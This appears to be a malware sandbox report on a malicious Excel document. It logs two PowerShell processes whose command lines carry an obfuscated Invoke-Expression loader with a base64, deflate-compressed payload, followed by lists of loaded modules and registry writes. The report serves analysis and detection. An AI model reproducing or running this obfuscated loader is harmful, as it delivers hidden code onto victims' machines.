hqMOzf+zcccmYZA37mirWoq+Mv06NHh7XDL5g1mm4aVmKOq648IuJKYjUewmNgCBFUs4DBDXDDUGmpF4RsYOwTOW/LXysAio4l3VeiGAJ22Pnkx1OAVMeo/wicaafPC05U4ExJVdDUvZTpy/u5zrT1CU9/VCj8xQF0s4dNz+zIzXCIFso62UM3UoyelucBb4jU5eoc3ymQXMnj+hvSnwO+E9KtWS6BfUyj6epn5UqNp7uQrYXjDQ7f6cjdDlsbI6UunS8nh4iTaN+sxiZl746Q6R7bRYhe6IpQPx5OOoTkxqNLRUBcC9RARmKqRJviCLs7jANQ/EfYy5g9JS4C2fqKSFWVxtZZO2M7mR7YiLqShnVTAryY2doDbogZe+QJWCizsweuzR6PUvma+jRjpu+MYfyWVh3xji+D+JzKNz9LZKy1NvqbxrEb55VIMXRhTQ3BKoLYL0j09Q/+dLtJ/DGFmJu+BsSaDlat2Oc62gPwyJGLqrSCm6autPt0AFPnSmUgu3okBMqLlEmLAsl5a53ZWLIuli9yFJ8MF6WGgJsFGV4sJDIDn1kDMctjBM1OFWc5IOBpIyO6SgS+IDgTSLaWLFtY+WpIF98bYooAySQvLVXBWDgMGjAzDNzJtPUX8UIxJSm3RNCg0eFzCJ5Gihaf4iMW41m0pGMhLWD3zyjB2gQcJfJNXK+GHM8kGkRgZNw0qR0tLYSULMUqIzD66BdJ1iAQHfzxJGRZM16IlVF8wCJkXP31sTZVQCfohAj/494GERounwMFPuQNWIupOACS71qqK/CaGsN17XzPmNh5gjG6aDBGM1CblZkl596VFjIAx9BG4WjrhlSYIATLJwbHtiAWGasfTRMUpLwAMuGZlUE2mMCmMZiWhUqsLCVBpq645624jljEkp0nCRbBScDG2ur3zO4IuTuMyDG2/ElOJK7JrdOS20rCDF4jdJZsE57IDoHqwM5j8Bzk3v4H+c+Or5XR84gE5+SncPSDfsms8ZZGRNVAbHZBJwcMUThFY0QDaFPSLNg/kVaa7dnlxNEDwwqvNj1M2t/wDGD7WcFILQ3Wh6wp+STDQ9IsEcn/iS2ZtF4l40ZNywGWHQPV9doIIKdyGffkVkek2V5rAa5RG+3CoLWpUsDKOjUEpWTq+rYwMlBr144si9aw93Lwi2XhxwISjdhkp+5Bc0+jZbIYiP0oAQxsbum1AQm6giednaUnLBzhw4uUAgsJyQ3CI7AgwgeNXyBbAZWWHTPIVQ0VTSTp70FJMZnL1ZRZNIPa8FgwEm+KkvzuyGQbECsBEvFzwBN4OP+aFS4pzRVxHKEKkXBtcqO1JEfhlU5ANFz1YSXprBT5/BkLeJAFaIdlHGhKeBU0IuzwoxQvGljEW6TpM5Jprzwg/odEkTmqbHfMKTYoyFQU7u+Z7GHG6KB+XWdQsH5B0rI6PMC6GU6ykAgWkPJvEwJpQpS3H9qCSc18D8T0NE0+Ef7AWbibgkS3clFupo1SiZuPSHY6Ao+JYepznDmyX/EBq7TRVNkYgX/iWJI71LimidMOkXFFBuBHMiugNqJ0X8oY+Ibc7KlF8lBSfttRXA/O60J0C7J1qpbVAnBAo0EGLxTAObPUJUwcjb0CD25eUbv5WuJWAsHS83jWwsKYySkEnTV1uo8WGJKwOsT3XENDRL9I4B38pHqrG6Kk1juagow4kA2lkQObYn0kCrQOYXiJYmVpZulSUO+op1dox5EyI3DLeyMeRtjEzVnSv33MG8I7EpBz/YnkERxpqSiKZlm6+5gV2B+ZNDCfvuamVHGFuEYMj2mGn1SDvw4uuUns4IaB82+QWVLp8Rd4/IDzZ/vq5un3GR1WCTPaV9O8/9z/j8='''' ), [io.COmPressioN.CoMpReSSIOnmodE]::DeCoMpReSS )|foReach{ neW-obJECt iO.StreAMREaDeR($_, [SystEM.tEXT.ENCOdinG]::AsCII ) }).REAdtoEND( )'')')"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ole32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\netutils.dll

PID
3640
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX "(' & ((gv ''*MDr*'').naMe[3,11,2]-Join'''') (neW-obJECt syStEM.Io.comPREssioN.deFlATEsTrEaM( [IO.MeMorYstrEAm][cONveRt]::frombAsE64STring( ''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'' ), [io.COmPressioN.CoMpReSSIOnmodE]::DeCoMpReSS )|foReach{ neW-obJECt iO.StreAMREaDeR($_, [SystEM.tEXT.ENCOdinG]::AsCII ) }).REAdtoEND( )')"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\shfolder.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.drawing\dbfe8642a8ed7b2b103ad28e0c96418a\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\c9b7480fe8ed9de8f2728e543bd52cb2\microsoft.powershell.graphicalhost.ni.dll
c:\windows\assembly\gac_msil\uiautomationtypes\3.0.0.0__31bf3856ad364e35\uiautomationtypes.dll
c:\windows\assembly\gac_msil\uiautomationprovider\3.0.0.0__31bf3856ad364e35\uiautomationprovider.dll
c:\windows\assembly\gac_msil\windowsbase\3.0.0.0__31bf3856ad364e35\windowsbase.dll
c:\windows\assembly\gac_32\presentationcore\3.0.0.0__31bf3856ad364e35\presentationcore.dll
c:\windows\assembly\gac_msil\presentationcffrasterizer\3.0.0.0__31bf3856ad364e35\presentationcffrasterizer.dll
c:\windows\assembly\gac_msil\presentationframework\3.0.0.0__31bf3856ad364e35\presentationframework.dll
c:\windows\assembly\gac_msil\presentationui\3.0.0.0__31bf3856ad364e35\presentationui.dll
c:\windows\assembly\gac_32\system.printing\3.0.0.0__31bf3856ad364e35\system.printing.dll
c:\windows\assembly\gac_msil\reachframework\3.0.0.0__31bf3856ad364e35\reachframework.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\windowsbase\cf293040f3a93afa1ea782487acae816\windowsbase.ni.dll
c:\windows\system32\netutils.dll

Registry activity

Total events
3067
Read events
2000
Write events
1007
Delete events
60

Modification events

PID
Process
Operation
Key
Name
Value
1160
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
1160
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
1160
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\E7636
1160
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
1160
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\E7915
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
6+5
362B350088040000010000000000000000000000
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
88040000FCCE67EC57F3D40100000000
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\E7636
E7636
04000000880400004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00010000000000000050898EEE57F3D40136760E0036760E0000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\E7636
E7636
04000000880400004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00010000000000000050898EEE57F3D40136760E0036760E0000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1160
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1317994519
1160
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1317994640
1160
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1317994500
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{C6791793-8604-4AAF-A345-8360A229EAF5}
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\E7636
E7636
